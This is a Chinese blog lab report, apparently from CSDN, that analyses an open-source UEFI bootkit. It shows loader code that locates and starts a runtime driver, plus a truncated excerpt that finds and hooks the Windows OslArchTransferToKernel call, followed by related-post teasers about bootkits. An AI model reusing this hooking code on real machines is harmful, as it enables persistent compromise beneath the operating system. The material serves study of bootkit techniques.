UEFIBootkit攻击恶意代码分析

已于 2024-02-13 14:57:36 修改
阅读量648 收藏 21
点赞数 22
文章标签: mfc c++
于 2024-02-13 14:57:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61043657/article/details/136106859
版权
本文详细介绍了UEFIBootkit攻击的原理和实验过程,包括恶意代码的调试与编译,以及如何实现对操作系统引导文件的感染。通过分析LocateFile、ImageLoad和ImageStart等关键函数,理解Bootkit攻击技术。此外,还提到了CPU漏洞SWAPGS,分析了其攻击原理和影响,以及如何寻找和利用易受攻击的内核模块。
摘要由CSDN通过智能技术生成

UEFIBootkit攻击恶意代码分析

一、 实验目的

对于UEFI的攻击,从感染方式和攻击层次上来讲,可以分为两种:一种是针对UEFI固件的攻击,一种是磁盘上引导文件的攻击。本次实验着重介绍第二种。调试和编译指定UEFIBootkit恶意程序,加深对Bootkit攻击技术的理解,掌握对操作系统引导文件感染的方法,实现引导完整性攻击,丰富UEFI固件攻击方式。

二、 实验环境

Windows10
Vs2015 P

三、 实验要求

(1)调试和编译开源UEFIBootkit代码,实现引导劫持攻击。

(2)阅读和分析UEFIBootkit代码,深入理解UEFIBootkit攻击技术原理。

四、 实验步骤

1.源码分析
项目结果组成:

下面对核心代码进行解释:
//
// Locate the runtime driver
//
efiStatus = LocateFile( gRuntimeDriverImagePath, &RuntimeDriverDevicePath );
if (EFI_ERROR( efiStatus ))
goto Exit;
//
// Load Runtime Driver into memory
//
efiStatus = ImageLoad( ImageHandle, RuntimeDriverDevicePath, &RuntimeDriverHandle );
if (EFI_ERROR( efiStatus ))
goto Exit;
//
// Transfer executon to the Runtime Driver
//
efiStatus = ImageStart( RuntimeDriverHandle );
if (EFI_ERROR( efiStatus ))
goto Exit;
其代码流程非常简单,通过LocateFile函数遍历所有分区,查找rtdriver.efi,找不到就直接退出,然后通过ImageLoad函数将驱动加载至内存(不运行),最后调用函数ImageStart运行bootkit驱动,代码完成,程序退出。
其次是rtdriver的主要代码:
NtHdr = ImageNtHeader( ImageBase );
if (NtHdr != NULL)
{
EFI_STATUS EfiStatus = EFI_SUCCESS;
UINT8* Found = NULL;

	// Find right location to patch
	EfiStatus = UtilFindPattern( sigOslArchTransferToKernelCall, 0xCC, sizeof( sigOslArchTransferToKernelCall ), ImageBase, ImageSize, (VOID**)&Found );
	if (EfiStatus == EFI_SUCCESS)
	{
		Print( L"Found OslArchTransferToKernel call at %lx\r\n", Found );
		
		// Get original from call instruction
		oOslArchTransferToKernel = (tOslArchTransferToKernel)UtilCallAddress( Found );
		Print( L"OslArchTransferToKernel at %lx\r\n", oOslArchTransferToKernel );
		Print( L"OslArchTransferToKernelHook at %lx\r\n", &hkOslArchTransferToKernel );
		
		// Backup original function bytes before patching
		OslArchTransferToKernelCa
最低0.47元/天 解锁文章
-<白日梦想家>-
关注
  • 22
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
BlackLotus UEFI Bootkit 对 Windows 11 系统构成严重威胁
code2day的博客
03-03 809
BlackLotus UEFI Bootkit 是一种恶意软件,它可以通过修改计算机的启动程序来控制计算机并窃取敏感信息。
叙Windows平台下基于MBR和UEFIbootkit(一)--以MBR为例
weixin_30455365的博客
09-09 283
  安全的对抗首先在权限方面,权限高的进程对权限低的权限就是就是降维打击,无往不利。当权限相同时,启动得早便为王。所谓的bootkit也就是基于这个思路设计的一种复杂病毒。它优先于Windows系统启动,自然也就优先于杀毒软件启动的时间。鉴于国内对bootkit的文章不多,本文想介绍一下bootkit的具体技术细节。为了保证内容的梯度和完整度,其中基于MBR的rootkit分别以WindowsXp...
推荐开源项目:UEFI-Bootkit
最新发布
gitblog_00071的博客
05-23 412
推荐开源项目:UEFI-Bootkit UEFI-BootkitA small bootkit which does not rely on x64 assembly.项目地址:https://gitcode.com/gh_mirrors/ue/UEFI-Bootkit 1、项目介绍 UEFI-Bootkit 是一个独特的引导加载程序工具,其特别之处在于它完全不使用汇编语言。这个项目由Aidan...
探索 RedLotus:Rust 实现的 Windows UEFI Bootkit
gitblog_00082的博客
05-21 274
探索 RedLotus:Rust 实现的 Windows UEFI Bootkit bootkit-rsbootkit-rs - 一个用 Rust 编写的 Windows UEFI Bootkit,用于手动映射驱动程序,绕过驱动签名强制要求(DSE)。项目地址:https://gitcode.com/gh_mirrors/bo/bootkit-rs 在网络安全与系统研究的世界中,开源项目常常推动...
第一个感染UEFIBootKit——DreamBoot复现
摔不死的笨鸟的博客
03-13 1370
环境Windows 8 64位企业版 首先看下UEFI的启动过程。 **DreamBoot的HOOK情况** 其中bootmgfw.efi被EFI固件在0x10000000地址处加载。 在加载winload.exe的入口点代码前,进行 .text:0000000010108D78 call bootmgfw_Arch...
Windows恶意代码剖析实验
08-01
运用OD(动态分析工具)、IDA(静态分析工具)、PEid(查壳工具)等工具对window恶意代码进行具体分析
UEFIBOOTKIT的工作原理
04-02
1. UEFIBOOTKIT会替换固件BIOS中的某些代码,从而使得它能够在系统启动时运行自己的代码。 2. UEFIBOOTKIT会在系统启动时加载自己的驱动程序,以获取系统的完全控制权。 3. UEFIBOOTKIT会通过修改系统内存中的启动...
简要说明UEFIBOOTKIT的工作原理和危害
04-02
UEFIBOOTKIT是一种恶意软件,它利用计算机的UEFI(统一固件接口)来实现自启动和植入恶意代码的功能。它的工作原理是通过修改启动选项,将自己伪装成操作系统或者驱动程序,从而在计算机启动时自动运行并植入恶意...
用于驱动程序手动映射的UEFIbootkit_C_下载
09-02
(更多详情、使用方法,请下载后细读README.md文件) 地图\nWindows UEFI bootkit 加载通用驱动程序手动映射器而不使用 UEFI 运行时驱动程序。\n用法\n使用以下文件系统结构设置 FAT32 格式的闪存驱动器:编译的 ...
HTML恶意代码的实验步骤.pdf
07-11
HTML恶意代码的实验步骤.pdf 学习资料 复习资料 教学资源
简要说明UEFIBOOTKIT的工作原理和危害。
04-02
UEFIBOOTKIT是一种恶意软件,它利用了...此外,UEFIBOOTKIT还可以实现远程控制计算机,使得攻击者可以远程操纵受害者的计算机。由于UEFIBOOTKIT的隐蔽性,它很难被发现和清除,给用户和企业带来了极大的安全威胁。
恶意代码分析实战_实验练习
weixin_41487541的博客
02-14 3549
Lab1-1 2. 这些文件是什么时候编译的? 在PE文件中,IMAGE_NT_HEADERS > IMAGE_FILE_HEADER > Time Date Stamp字段记录了文件编译时间。利用 010 Editor 打开exe文件和DLL文件,找到相应字段如下: 可知exe文件编译时间为2010.12.19 16:16:19 3. 这两个文件是否存在迹象说明它们是否被加壳或混淆? 利用PEiD检测两个文件的加壳情况: ...
【实验报告】四恶意代码实验
weixin_30469895的博客
10-29 180
学号201421420038 中国人民公安大学 Chinese people’public security university 网络对抗技术 实验报告 实验四 恶意代码技术 学生姓名 何劲毅 年级 14级 区队 ...
网络安全实验九 恶意代码实验
qq_64314976的博客
06-22 1225
为结束IE浏览器中不停打开的网易主页,通过选中“进程”选项卡,选中“IEXPLORE.EXE”,点击“结束进程”。为结束IE浏览器中不停打开的网易主页,通过选中“进程”选项卡,选中“IEXPLORE.EXE”,点击“结束进程”。进入“我的电脑”,点击工具→文件夹选项,进入文件夹选项窗口,选中“查看”选项卡,将“隐藏已知文件类型的扩展名”签名的勾去掉,并点击“确定”。进入“我的电脑”,点击工具→文件夹选项,进入文件夹选项窗口,选中“查看”选项卡,将“隐藏已知文件类型的扩展名”签名的勾去掉,并点击“确定”。
实验报告四恶意代码实验
weixin_30270889的博客
10-29 1067
学号201421420032 中国人民公安大学 Chinese people’public security university 网络对抗技术 实验报告 实验四 恶意代码技术 学生姓名 赵致远 年级 14级 区队 ...
恶意代码分析实战—实验3-3
qq_43481350的博客
09-01 429
实验环境 实验设备环境:windows XP 实验检测工具:process monitor ,porcess explore 实验思路 1、观察恶意程序创建出的进程 2、分析正常进程与恶意程序进程的不同 3、监控并分析恶意程序的特征 实验过程 1、当使用process monitor进行监控的时候,你发现了什么? 打开process explore之后再打开我们的程序Lab03-03.exe,我们会发现,此程序会创建一个svchost.exe并且将自己隐藏了起来,如下: 可以观察到其是一个孤儿进程,即没有
CQU恶意代码分析实验二
qq_62535870的博客
03-27 1672
将U盘上的两个分区格式化,分别格式化为FAT32格式和NTFS格式,然后在两个分区分别创建大文件、小文件和文件夹,来观察两种文件系统的存储原理。
恶意代码分析实战第9章实验
weixin_41487541的博客
03-01 713
Lab 9-2 1. 在二进制文件中,你看到的字符串是什么? 首先使用peid进行查看,发现无壳。IDA打开Lab09-02.exe之后查看字符串: 可以看到有一些分配失败提示。 2. 当你运行这个二进制文件时,会发生什么? 什么都不会发生。 3. 怎样让恶意代码攻击负载运行? 首先IDA中进行静态分析 可以看到获取当前可执行文件的路径函数,又调用了_strrchr函数查找在GetModuleFile...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值